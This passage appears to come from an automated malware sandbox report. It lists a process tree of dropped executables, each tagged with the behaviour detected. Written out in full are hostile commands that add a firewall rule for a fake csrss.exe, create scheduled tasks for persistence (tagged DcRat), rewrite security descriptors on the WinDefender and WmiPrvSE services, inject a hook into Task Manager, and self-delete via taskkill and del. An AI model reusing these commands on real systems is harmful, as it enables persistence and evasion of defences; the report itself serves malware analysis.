- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\AA09.exe"C:\Users\Admin\AppData\Local\Temp\AA09.exe" -h2⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1248 -ip 12481⤵
-
C:\Users\Admin\AppData\Local\Temp\CDFD.exeC:\Users\Admin\AppData\Local\Temp\CDFD.exe1⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\F3F5.exeC:\Users\Admin\AppData\Local\Temp\F3F5.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 13244 -s 4762⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 13244 -ip 132441⤵
-
C:\Users\Admin\AppData\Local\Temp\E35.exeC:\Users\Admin\AppData\Local\Temp\E35.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\E35.exe"C:\Users\Admin\AppData\Local\Temp\E35.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)4⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
- Launches sc.exe
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe4⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "csrss" /f5⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f5⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\1CEC.exeC:\Users\Admin\AppData\Local\Temp\1CEC.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1CEC.exeC:\Users\Admin\AppData\Local\Temp\1CEC.exe2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\1CEC.exe"C:\Users\Admin\AppData\Local\Temp\1CEC.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1CEC.exe"C:\Users\Admin\AppData\Local\Temp\1CEC.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe"C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe"C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe"6⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe" & del C:\PrograData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build3.exe"C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build3.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build3.exe"C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\3EEC.exeC:\Users\Admin\AppData\Local\Temp\3EEC.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 24400 -s 8722⤵
- Program crash
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 24400 -ip 244001⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"1⤵
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultcf181a94h683bh4895h9aa3hb1821fc5d9361⤵
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc693546f8,0x7ffc69354708,0x7ffc693547182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,13125924653994887955,11332406325770881414,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,13125924653994887955,11332406325770881414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,13125924653994887955,11332406325770881414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault7d5de6behba09h417eh9b35h517f5e591fd21⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc6bab46f8,0x7ffc6bab4708,0x7ffc6bab47182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9862538726728582456,14984541969093872141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,9862538726728582456,14984541969093872141,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2576 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,9862538726728582456,14984541969093872141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault7a95d11bh78d3h48edhb7b4hcb0b278b36a71⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc6bab46f8,0x7ffc6bab4708,0x7ffc6bab47182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,941998987165426854,2225039285888782487,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,941998987165426854,2225039285888782487,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,941998987165426854,2225039285888782487,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:32⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault5453c971h7adbh49d8h89b8hc064de5018561⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc6bab46f8,0x7ffc6bab4708,0x7ffc6bab47182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,14901281254086696735,4316719583474350271,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,14901281254086696735,4316719583474350271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,14901281254086696735,4316719583474350271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3176 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\ddefwhhC:\Users\Admin\AppData\Roaming\ddefwhh1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 19588 -s 3402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 19588 -ip 195881⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:?launchContext1=Microsoft.Windows.Cortana_cw5n1h2txyewy&url=https%3A%2F%2Fwww.bing.com%2Fsearch%3Fq%3Dproexp%26form%3DWNSGPH%26qs%3DSW%26cvid%3D57b1c4ab73a548f7982ccc54f5fc2fd3%26pq%3Dproexp%26cc%3DUS%26setlang%3Den-US%26nclid%3D03E26D907E30E8998728BC8DB27F263E%26ts%3D1663014022330%26nclidts%3D1663014022%26tsms%3D3301⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xd8,0x110,0x7ffc6ba946f8,0x7ffc6ba94708,0x7ffc6ba947182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4932 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2440 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5544 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5460 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2468 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:12⤵
-
